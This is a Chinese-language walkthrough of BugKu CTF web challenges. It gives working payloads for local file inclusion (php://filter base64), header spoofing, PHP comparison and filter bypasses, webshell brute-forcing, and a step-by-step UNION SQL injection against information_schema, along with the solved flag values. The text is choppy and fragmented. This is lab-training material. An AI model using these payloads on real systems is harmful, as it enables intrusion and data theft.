全面复习web,给本身定个目标,后天以前结束BugKu-Web,开始逆向。php
==
,弱等于以前会把等号两边转化为同一类型变量;X-Forwarded-For: 127.0.0.1
;php://input
配合<?php echo system('ls');?>
和php://filter/read=convert.base64-encode/resource=index.php
;https://ctf.bugku.com/challenges#web2
html
https://ctf.bugku.com/challenges#计算器
web
flag{CTF-bugku-0032}
https://ctf.bugku.com/challenges#web基础$_GET
正则表达式
?what=flag
,输出flagflag{bugku_get_su8kej2en}
https://ctf.bugku.com/challenges#web基础$_POST
sql
what=flag
,请求获得flagflag{bugku_get_ssseint67se}
https://ctf.bugku.com/challenges#矛盾
shell
num=1qwk
,获得flagflag{bugku-789-ps-ssdf}
https://ctf.bugku.com/challenges#web3
数据库
KEY{J2sa42ahJK-HS11III}
https://ctf.bugku.com/challenges#域名解析
json
http://123.206.87.240/
后,用hackbar修改host为flag.baidu.com
便可得KEY{DSAHDSJ82HDS2211}
https://ctf.bugku.com/challenges#你必须让他停下
数组
flag{dummy_game_1s_s0_popular}
https://ctf.bugku.com/challenges#本地包含
浏览器
https://ctf.bugku.com/challenges#变量1
<?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?>
?args=GLOBALS
获得flagflag{92853051ab894a64f7865cf3c2128b34}
https://ctf.bugku.com/challenges#web5
ctf{whatfk}
https://ctf.bugku.com/challenges#头等舱
flag{Bugku_k8_23s_istra}
https://ctf.bugku.com/challenges#网站被黑
dirb http://123.206.87.240:8002/webshell/
shell.php
,须要输入密码,弱密码很差用,考虑爆破。获得密码为hack
,输入获得flagflag{hack_bug_ku035}
https://ctf.bugku.com/challenges#管理员系统
dGVzdDEyMw==
,base64解码得test123
,多是密码,X-Forwarded-For: 127.0.0.1
,获得flag85ff2ee4171396724bae20c0bd851f6b
https://ctf.bugku.com/challenges#web4
function checkSubmit(){ var a=document.getElementById("password"); if("undefined"!=typeof a){ if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value) return!0; alert("Error"); a.focus(); return!1}} document.getElementById("levelQuest").onsubmit=checkSubmit;
1466644826
,尝试输入KEY{J22JK-HS11}
https://ctf.bugku.com/challenges#flag在index里
http://123.206.87.240:8005/post/index.php?file=show.php
,这个跳转的连接有点眼熟,好像是文件包含漏洞,因而我尝试php://input
,可是好像被过滤了php://filter/read=convert.base64-encode/resource=index.php
,成功输出结果,转码后获得flagflag{edulcni_elif_lacol_si_siht}
https://ctf.bugku.com/challenges#输入密码查看flag
flag{bugku-baopo-hah}
https://ctf.bugku.com/challenges#点击一百万次
https://ctf.bugku.com/challenges#备份是个好习惯
[空密码]
,这是啥玩意,哦哦wc,这是重复了两遍的同一个bak swp
等,构造payloadindex.php.bak
,成功下载到文件<?php /** * Created by PhpStorm. * User: Norse * Date: 2017/8/6 * Time: 20:22 */ include_once "flag.php"; //引入文件 ini_set("display_errors", 0); //不报错 $str = strstr($_SERVER['REQUEST_URI'], '?'); // 截取问好以后的内容 $str = substr($str,1); // 把问号去掉 $str = str_replace('key','',$str); // 过滤掉字符key,能够用复写kekeyy绕过 parse_str($str); // 把str解析到变量中,这种状况直接替代同名变量 echo md5($key1); echo md5($key2); // 这就是咱们一开始看见的两个md5值的缘由 if(md5($key1) == md5($key2) && $key1 !== $key2){ // 获得flag的条件,key1不等于key2,可是他们的md5值相等,这理论上是不可能的,可是咱们能够用数组求md5返回false来绕过 echo $flag."鍙栧緱flag"; } ?>
http://123.206.87.240:8002/web16/index.php?kekeyy1[]=1&kekeyy2[]=2
Bugku{OH_YOU_FIND_MY_MOMY}
https://ctf.bugku.com/challenges#成绩单
id=1
,输出正常id=1' ^(1)%23
,没输出id=1' ^(0)%23
,输出正常,说明存在注入1' ORDER BY 4%23
,输出正常1' ORDER BY 5%23
,输出错误,说明查询结果有4列0' UNION SELECT 1,2,3,4%23
,输出正常,能看到每个输出对应的地方,可谓一个萝卜一个坑🥕id=0' UNION SELECT database(),2,3,4%23
,查询数据库名为skctf_flag
id=0' UNION SELECT database(),(SELECT GROUP_CONCAT(table_name) FROM information_schema.TABLES WHERE table_schema='skctf_flag'),3,4%23
,查询数据库下表名为fl4g,sc
id=0' UNION SELECT database(),(SELECT GROUP_CONCAT(column_name) FROM information_schema.COLUMNS WHERE table_name='fl4g'),3,4%23
,查询表fl4g下列名skctf_flag
id=0' UNION SELECT database(),(SELECT GROUP_CONCAT(skctf_flag) FROM skctf_flag.fl4g),3,4%23
,查询列skctf_flag
中数据获得flagBUGKU{Sql_INJECT0N_4813drd8hz4}